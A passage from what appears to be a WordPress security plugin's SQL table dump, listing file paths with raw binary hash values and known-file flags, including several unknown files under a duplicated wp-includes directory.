�H�_c��Q�X��̤�ՏLs�ڭ�','',0,'?'),('\\H���:��u3�%�Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�2�H���$�\n�','5�(�/��PhJS�Z\"&]}���r�Ip�(�-t��','',0,'?'),('\\[��i%Ͱ<��e�>�','wp-includes/css/wp-pointer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b;���f�J-�',' \0��Drá�)�\Z�k��y�Q��h�q�.\nCK','',0,'?'),('\\���mՀ����;�','wp-content/plugins/wp-cerber/assets/flags/eg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�֙�x�8��\0 ','�_�ih��<�[������Ns�D}?\'��C�Y','',0,'?'),('\\��s1��M�	��','wp-includes/wp-includes/Requests/Exception/HTTP/403.php',0,'��`�\r�o��k3��1�','��`�\r�o��k3��1�','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('\\�@t��4�H���','wp-content/themes/shootingstar/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I���DB1�L|%��l�','S[�#g3\'�$���1f�Fl�ӧ���a��:','',0,'?'),('\\������7���Q�o','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('\\�т�?$�̈́8����','wp-admin/includes/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ê��m\Z�E��Y��.','&����3��eſ�.��(���{��T�Cv.','',0,'?'),('\\�\0��>�+���Fb��','wp-admin/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U��:#�+a���F','�C���f��`���]����|#wVÉBH)\r','',0,'?'),('](R�&!��1;�3��','wp-includes/js/wp-ajax-response.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�Hme_\Z��!5','��c�����z�2�~;~�D��*T�?�&�','',0,'?'),(']1���ZCEg#!�<(','wp-includes/wp-includes/ms-default-filters.php',0,'l�����n����','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),(']9OUâ��\n��V','wp-content/plugins/wordfence/js/admin.liveTraffic.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڗU�_|�$>���7','wR�u�sXq��s�a�OFvQ�y�Ł#���','',0,'?'),(']@$���ɩ��&h��y�','wp-includes/wp-includes/Requests/Response.php',0,'�p����R櫷�\'G','�p����R櫷�\'G','����WwYKL\n��	-*���^e\"e�(_,g','',0,'?'),(']B#�2�z��bU��/','wp-includes/Text/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r� \ZV���:��','�N\'�u�p���=Z�\"-��K����r','',0,'?'),(']L0���eE�\"u� ��','wp-includes/js/mediaelement/mediaelement-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),(']x��6�a�[�|��','wp-content/plugins/wp-cerber/assets/flags/sl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nU�r�̨�^̧\0�','h�+ѩEfp��\Z��tт�5�X���T:�K�6','',0,'?'),(']���N��Jjӎe���','wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�����O���\\��','�b�Z�r��A��{�_���d���5|','',0,'?'),(']���r�:@��I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6:����2kP3���','%u���Mp����,.\0�@�Zq��r��/���Q','',0,'?'),(']�J��f��Dx/$l�','wp-includes/wp-includes/Requests/Exception/HTTP/410.php',0,'q�O47ߺݥ/8X!��','q�O47ߺݥ/8X!��','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),(']��P���Tkvt��8A','wp-admin/network/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ż\Z�=>� ɱ�l�','y�TQmU��z�D��s�g���1^T\"�ig�I','',0,'?'),(']���*������J�','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��E��H)�.��','��& �qC1QU�_.O��3����1!&��۴��','',0,'?'),(']����\"}[�Y�R�','wp-admin/css/edit-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H7g���8Y�y�','��Ϛ����Z:��J�Dz��#y04�?','',0,'?'),(']��	\0�w��	h��','wp-content/themes/sg-window/img/icons/friendster.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uٰ��\"��@=A','��w��Ra\Z��Ub.��\n�a�5?��1$oF.�&','',0,'?'),(']�~t��j�@���u��','wp-includes/wp-includes/images/media/interactive.png',0,'R׬˂���ôʼnh�H','R׬˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),(']��5ҰW�� 󨵿','wp-includes/wp-includes/js/dist/vendor/react-dom.min.js',0,'�c�JeN���uL��','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),(']�D�d���3��3�t�','wp-content/plugins/wp-cerber/assets/flags/hr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZO��e.��.�o','e��T��\\��B;vu��!�\0~\" P��;�','',0,'?'),('^�4�j�|��I��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�H*f��$��ʝӐ','���Ɲic�z�P��1�\"ݢӛo�TWry�*F','',0,'?'),('^(�?�t�p���,$�','wp-includes/block-patterns/large-header-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\r��\Z�&o�r\'���','\0�9�w�i����5�������}���h��','',0,'?'),('^9(-(Ų�y ���0q*','wp-admin/user/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�N ����9�3nDl','r���R89�<�;9i1l�Z���Q��oC#�Y��','',0,'?'),('^@ղ{\'��_���92','wp-admin/upgrade-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[a�@1.��Q��Z','�tˁ�����9{��/��y�g1\'�uV��l�','',0,'?'),('^H\0�B|��4�@z��','wp-includes/IXR/class-IXR-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('^U�.i��ypG���','wp-includes/js/mediaelement/mediaelementplayer-legacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('^^�L���y$��B�n','wp-includes/wp-includes/blocks/text-columns/block.json',0,'�?�ȴ����Y͆ ','�?�ȴ����Y͆ ','�A��-�תe���`�)�\'WS>KXIZ��','',0,'?'),('^d?e��.o���ʨ�L','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�C�=sy3�L���','�_��o3�t�Y��_o��f2k#��0�6Ps;','',0,'?'),('^yG=ڜFg;3�á�','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RC���Ty�?�','D����H�~����Ϩ�P�_�{�!��','',0,'?'),('^�Ð��+�y|�','wp-includes/images/crystal/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('^�+l=�Ubo�(j','wp-includes/wp-includes/js/wpdialog.min.js',0,'=nR�-��KP��=��<','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('^��u�u��W�d�M=�','wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=E�o0��[�','�m?\Z�\"�g��=�0�N\"��Q��`�u\'��~I','',0,'?'),('^ƀ�4���9�م�','wp-content/themes/shootingstar/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oR�	4?*8#���j��','P�Տu?`f��Zѐ)�V\r��d&N�Gs�','',0,'?'),('^����JA�m�b�','wp-content/themes/sg-window/page-templates/left-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�ٜcz�h2����','��	�qP��o�xۛ�f�92}��f�sK�','',0,'?'),('^�^\\Q��=(w��','wp-includes/js/imagesloaded.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('^�\r6&�ҖF;��oB','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P%S�%<��?�\Z��\\','gO�:!��rh��ʀ6�\'wf��D���z�','',0,'?'),('_�\0��d �MP~��D','wp-includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pق�g�OVjX�����','�4k�B�3S��������\"���\ZBG�ǎ\0KV','',0,'?'),('_�k4�!*}��݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����|%��*T*�`�','�����289v�u3�n	C2�s��va/�','',0,'?'),('_*�⽞L�0�>\r','wp-includes/feed-rss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN+�5	��O?','�@!�`C��*Me��z�j@	�@���L�jw�','',0,'?'),('_�#��U1p�GS�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���rt��w��(�e','�ҿD�I<�^�i2dW�]G�_�-+�A8�W','',0,'?'),('_%���=�*I�I+nd','wp-includes/wp-includes/SimplePie/Rating.php',0,'�jkB�-\r?Q3Qw�U7','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('_/dyY�\r�}$ʓ��','wp-content/plugins/wp-cerber/assets/flags/ni.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�MZsu���/��','�Cd0���HF|�\ne��ʅ�p�_�SӲ@\0@1<ۊ','',0,'?'),('_Uc���\n��K�j�','wp-includes/wp-includes/random_compat/byte_safe_strings.php',0,'�[Bң�J�Ԉ�;','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('_j��_��/���yӱ','wp-includes/load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x8�7n�LH�g�gf�R','ŗْl5�������Xt�����C�\n�mA','',0,'?'),('_�f�>��*��_\n','wp-content/plugins/wp-cerber/assets/flags/ru.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q���j�/�53\r�','�z\rf�/���x�.��5Q&i�HCn�0�','',0,'?'),('_�O�$^����5��','wp-content/plugins/wp-cerber/assets/ui-stack.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#`LZ)�pd��','Ɉ���H���R�{(~\0*8���!�^�u�','',0,'?'),('_�\0>Orm��e�m�','wp-includes/wp-includes/widgets/class-wp-widget-search.php',0,'��}��z�Ys��]�','��}��z�Ys��]�','H:�wn����n8V��9�\'�tLYƭBq����','',0,'?'),('_�|��T�M^���J','wp-includes/css/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p^�,f�ޡ�����I{�','��i�4�j�v�J5�d���߲TP��L�/��7�','',0,'?'),('_��4�3���=��','wp-includes/images/uploader-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('_�(�C���M6�9�','wp-admin/includes/class-wp-links-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�6�Z3@][:����+','A���D��c?��L���I�OB��Oß��L','',0,'?'),('_����8}���?�','wp-includes/css/media-views-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���X�Н�KH�Os8�',')�Z\\��^��hG*y����2Ԏ�k]䜹Yu�5*','',0,'?'),('`6˻0�ܮ�{�[+','wp-includes/wp-includes/images/smilies/icon_twisted.gif',0,'L��v[?��+*8��;�','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('`�\n�؄K�?\rʐ��A','wp-content/themes/shootingstar/content-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�w#�t)���=M��s','`����9N#]�;�|��n�q��J5_يSN/�I','',0,'?'),('`%�ֽ�j��\'��P��','wp-admin/js/edit-comments.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0K@�n��d�Œ�Ψ�','��-(j�e�Q5���3��\0`NJ�b�(OS�:b','',0,'?'),('`fJl�����\n��','wp-includes/wp-includes/js/plupload/wp-plupload.js',0,'K%A�};܃q:{��','K%A�};܃q:{��','+8k�����/S*15xB�L6R�P���4�5�','',0,'?'),('`��gf�W�\n&OPw','wp-content/plugins/wp-cerber/assets/flags/sg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*F��Y����K�	a','Ԩ��Vm�f��Ek$��;]N_q�^�4����(�','',0,'?'),('`��\n���2����','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V��DBQVgF','w��86=�ݔ����2�\rD%V��E5�S�	�T�','',0,'?'),('`��mO��1����Ս','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/icons/visited.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n���d7w�H��','{��z�9�X�\Z�RKf������衔����','',0,'?'),('`���#��Q�?>6)','wp-content/plugins/wp-cerber/assets/flags/fk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�OwB<����oa9�E�','�k��؊�2��M&C9�&0d�Hl��q~9q','',0,'?'),('`�a�(�g��\"��','wp-includes/js/dist/html-entities.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�$�G��P^3�̎�','���0u�E��w��>�v�L���Qݓ��q','',0,'?'),('`�c0���\\���3�','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	>�U6ƪg��v�f','R�&sX$6#���_��ν�J�|�b0�o','',0,'?'),('`��Q&���V9zI�','wp-includes/wp-includes/images/wpspin-2x.gif',0,'mS������y\"C���','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('`�4W�\r��ݚ[}�=�','wp-includes/wp-includes/css/wp-embed-template.css',0,')I+�w2�h���K\"�',')I+�w2�h���K\"�','�6&�}�ok��AM\Z> �|�F�6,e�t\rPq','',0,'?'),('`���;�\"�-���+~;','wp-includes/js/tinymce/plugins/media/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('`�}+�6�L-q[��$','wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),('`��U�2���mdW','wp-includes/class-wp-customize-nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�8û�Td�h9�\Z','��g�n\\�y|�TR�xF����\\��A��&7֏�d','',0,'?'),('a�)6����ю�','wp-includes/js/plupload/moxie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('a�����2���*s','wp-includes/wp-includes/css/dist/block-editor/style.min.css',0,'݁mz���O���ya*p','݁mz���O���ya*p','��&aX�\n��q�E�D������$3Gt���','',0,'?'),('a)�TMW�Oo��Q�|�','wp-admin/images/media-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6@p�z^ye��','_\Z���SjזY ����V�Z��Gen�_','',0,'?'),('a\\c,I\"5T��#̋�','wp-admin/images/media-button-music.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4^&$o��uf&�','�wWd¼8P�F6�A����ܴ�to-��X\\��a$','',0,'?'),('akJ�\Z���[�tx9BP','wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',0,'Ͷ���U裦�h�','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),('a�����|�f6��{�','wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',0,'�We⎆?��N��t','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),('a���γo��q�\"�','wp-includes/wp-includes/http.php',0,'�-��X㑩��/��2','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('a�?��_�ˢ��6j��X','readme.html',0,'c��P���n�HH˭�','c��P���n�HH˭�','8��	8�9��(L��:v�2l1�TSV����','',0,'?'),('a�J��r���&�-D�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��o��}S}���8.','�$��s�����?;f�Ġ=`\r�	��&��!','',0,'?'),('a����(m�EB�l�','wp-includes/media-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]p�uA@j4� k','|p��!NR�o�*mc�>�8��t���f5-\Z;m6','',0,'?'),('a�c�CH\r��=l@ĸ','wp-admin/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�D���w�o��}�D','	e�S�\nyp|Y��*h�.���ѽ⿞�ʆX','',0,'?'),('a�ai�G����}��\Z �','wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Э�bJ������\r%','�*��>}6��?j-9�N�AJ|�r���w�d�','',0,'?'),('a�&S���T�\"�l�9','wp-content/plugins/wp-cerber/assets/inspector.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zn�d���*k��P�j','�	�o���7Xv�o\ZC�D�j����p��','',0,'?'),('a��-�b��$G�Ι','wp-content/plugins/wp-cerber/assets/flags/sh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�{ͤ�:u�d�','�R<,l��I@�X�ߠ.#pF�g�%1O���6�','',0,'?'),('b�D�JD�J|��/�wk','wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js',0,')�r?�N�ぼI��q\'�',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('b*J{qd<�6Ui�q�','wp-includes/wp-includes/images/crystal/default.png',0,'A�>)*/��!�-�','A�>)*/��!�-�','���n$���_�u	�$Q3��E�׏r�|Jm�','',0,'?'),('b8��ޡ&��I��','wp-includes/wp-includes/sodium_compat/namespaced/Compat.php',0,'A�i�k�/��j\rn�3','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('bDQԇ���p5�t�d�y','wp-includes/wp-includes/js/codemirror/htmlhint.js',0,'�2�|џ�G�MtP5��','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('bT��9W><�]y��Ue�','wp-includes/wp-includes/https-detection.php',0,'x�5\\�r���(�W','x�5\\�r���(�W','W�|�_`|\\��y{4�N���Vp����j[','',0,'?'),('bY�,��ϥY�r۝�;�','wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('b���9���GQE��ґ','wp-content/plugins/wp-cerber/assets/flags/lv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���JqW6A���`>','�\0���jn!-xv��+u�j��D���<�7!�5�#','',0,'?'),('b���.ӛ����','wp-content/plugins/wp-cerber/assets/flags/om.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r]-�K��K<ݳ�8�','�;�8K�KI�k�O�[��\0v�U[JR$ ��','',0,'?'),('b��,\\8�#���','wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',0,'��SG��˺��F���','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('b���f�wis�A\"V>�L','wp-includes/wp-includes/widgets/class-wp-widget-text.php',0,'��;���\r9!�5�P�','��;���\r9!�5�P�','Y����7%��Z�Gݠ\Z��ӊr�cI�ϸ','',0,'?'),('b���HzfW����gw�','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�@����	�|���O�','g�v����K%��oiS�7�.�]�siH��2:p','',0,'?'),('b���Ҍ &�?�{','wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F꡻�S)8�׆>]�','',0,'?'),('b�+ƴݟ�3�','wp-includes/customize/class-wp-customize-nav-menu-location-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('b񪥲K�+x����wF','wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ç4�[�J��#�\'�','/˵t�?���;�!�o��Q$fm<L^��6E\r��x','',0,'?'),('c餟��(Ok1�!͂','wp-admin/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��W�\r��p4>9Z','*MY��P0������+5~���!�9OR�mҩ','',0,'?'),('c�4L]�˞��Mc','wp-admin/includes/class-wp-post-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@d�B��#�&&��','{��bk��\r���}�	{=��\\�=6�`l��	','',0,'?'),('c‹���p	�PU3/�','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM���,~/���r','F;���W]��&��z~o\'�/��q�+��','',0,'?'),('c%a��H�����','wp-admin/images/about-color-palette-vert.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�A�6���q�]�','�^��5P���n��>��:�����,G�I�z�R�','',0,'?'),('c,���[xޫ�3�\n�@','wp-includes/js/jquery/jquery.masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@`���&n|�}A��','�\\ۙ����	}M�g� �$�0� [���B','',0,'?'),('c42j���x�c��d','wp-includes/Requests/Session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��݆��Ζ���}l�','e`݆�.�΃:��j�E�\Z�Ұ���5�\Z�)','',0,'?'),('c��E�cc�/2��F','wp-content/plugins/wp-cerber/assets/flags/ba.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S߫��ܟ�]�A;\Z���','\Z2��u2S��9{��Ө�G�D�+�����1�','',0,'?'),('c�	�]�- ���tϠ','wp-includes/wp-includes/feed-atom-comments.php',0,'��\\�I�6bJ�i\"m��','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('c�Q��i�����Qv','wp-includes/css/dist/editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','հv��}�Ifs��>�','�J����Tc68H�\Z�s\'9]�6�p���4d','',0,'?'),('c�\Zj<�Fh���Q�%�','wp-includes/wp-includes/js/tinymce/utils/form_utils.js',0,'���l�U��T����Li','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('c�׭�z8��5Y���','wp-content/plugins/wp-cerber/assets/flags/pr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����M�_6�p�tz','n��S�X��\Z�h�m2��9��q���\Z�Z','',0,'?'),('c�c������gu���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('c��[b]��ݽ�JF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I]�U��	X�g����','�T�Ϛ-�1 [�@./i󒶦�i��q��0�o','',0,'?'),('d��:w���O�І','wp-includes/ID3/getid3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!N\0�[�5�իk@0','B�#����L�fW������>2�nT����','',0,'?'),('dv�?���񢤺=#b�','wp-includes/wp-includes/ms-network.php',0,'����x�����3.�','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('d��1�쵓-�;O��','wp-admin/js/custom-background.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L-Ф�%��l�r�e�','�����ė�\"ٿjz�r�?:j\'��������','',0,'?'),('dO*����weS�t�=','wp-includes/wp-includes/class-wp-walker.php',0,'z�+@,�G,��S^�y�','z�+@,�G,��S^�y�','�(8j�C[-��1�Ơ��ʖ��l3Om�','',0,'?'),('daM<M�=�[,&Y��7O','wp-includes/wp-includes/date.php',0,'n[*(Ҿ�w.m�y�z�','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('d�k�JQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\rc�c�l��?ɴծ','9� ÂM�\0KR���&���#+�vCf��','',0,'?'),('d���Auh��041�','wp-includes/blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\"����#�\'޻','j��$��)�~ŗH�x���}J�1z�м�v��','',0,'?'),('d�0�ٷ\Z�����Ԍn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<3�8xuFR�ĖȦ�E','n��?Q��bz	��٢�)��S*��,Z�','',0,'?'),('d�(��%J��@�G�','wp-admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�N���ﭪ=j\0��','�jG�AV�sF�����j�+�-)�D����','',0,'?'),('d�hħ{q4�2�K\"�','wp-includes/SimplePie/Rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('d�4�j�2U�V��$�P','wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7#Q�&M?»��|�[','Q�D���6���hP���qqM9�F�O��\\O�','',0,'?'),('d�@!��d�J���','wp-includes/js/mediaelement/mejs-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('e\0���h�L���щ��','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I��H��%���Y','���V��/r:s�/�S��l�\"#��:�3�','',0,'?'),('e\r��Zf���ޞ��|�','wp-includes/js/api-request.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('e���Xnj.\\�(&�d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�رm:h�\rGZ�ڋY','t8uU��U��SĒ�qf����S�3i���i�u','',0,'?'),('e�P�f��o!�J�%','wp-content/plugins/wp-cerber/assets/flags/yt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FE=�W��=�\'���','-�*U��	�K-:��햴�O��ա�3','',0,'?'),('e.PȴNB�Sx[�&��','wp-admin/includes/class-wp-plugin-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' :\'D<��*T;�G�','W 3\n�\'@G8y��;�FwTD���Zv�X�}��','',0,'?'),('e.���w��w�E','wp-includes/wp-includes/images/wlw/wp-comments.png',0,'L�6]P����.s���','L�6]P���